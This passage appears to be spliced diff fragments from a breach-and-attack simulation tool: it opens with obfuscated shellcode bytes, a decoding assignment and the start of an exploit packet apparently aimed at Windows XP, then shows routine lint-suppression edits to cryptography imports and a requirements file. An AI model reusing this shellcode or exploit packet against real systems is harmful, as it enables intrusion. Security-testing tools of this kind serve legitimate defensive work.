b'\x95\xe7V^O\xdak\xa0q\x81\xf81\xe3lq{\x0f\xdb\ta\xe7>I,\xab\x1d'
b'\xa0\x92Y\x88\x1b$\xa0hK\x03\x0b\x0b\xcf\xe7\xff\x9f\x9d\xb6&J'
b'\xdf\x1b\xad\x1b5\xaf\x84\xed\x99\x01\'\xa8\x03\x90\x01\xec\x13'
b'\xfb\xf9!\x11\x1dc\xd9*\xb4\xd8\x9c\xf1\xb8\xb9\xa1;\x93\xc1\x8dq'
b'\xe4\xe1\xe5?%\x1a\x96\x96\xb5\x94\x19\xb5o\x0c\xdb\x89Cq\x14M\xf8'
b'\x02\xfb\xe5\x88hL\xc4\xcdd\x90\x8bc\xff\xe3\xb8z#\x174\xbd\x00J'
b'\x1c\xc1\xccM\x94\x90tm\x89N"\xd4-')
SHELLCODE = clarify(OBFUSCATED_SHELLCODE)
SHELLCODE = clarify(OBFUSCATED_SHELLCODE).decode()
XP_PACKET = ("\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43"
"\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01"

View File

@ -1,9 +1,10 @@
import base64
import os
# PyCrypto is deprecated, but we use pycryptodome, which uses the exact same imports but it maintained
from Crypto import Random # noqa: DOU133
from Crypto.Cipher import AES # noqa: DOU133
# PyCrypto is deprecated, but we use pycryptodome, which uses the exact same imports but
# is maintained.
from Crypto import Random # noqa: DUO133 # nosec: B413
from Crypto.Cipher import AES # noqa: DUO133 # nosec: B413
from monkey_island.cc.server_utils.consts import MONKEY_ISLAND_ABS_PATH

View File

@ -18,6 +18,7 @@ pycryptodome==3.9.8
pytest>=5.4
python-dateutil>=2.1,<3.0.0
requests>=2.24
requests-mock==1.8.0
ring>=0.7.3
stix2>=2.0.2
six>=1.13.0

View File

@ -7,7 +7,9 @@ for more details.
import argparse
from Crypto.Hash import SHA3_512 # noqa: DUO133
# PyCrypto is deprecated, but we use pycryptodome, which uses the exact same imports but
# is maintained.
from Crypto.Hash import SHA3_512 # noqa: DUO133 # nosec: B413
def main():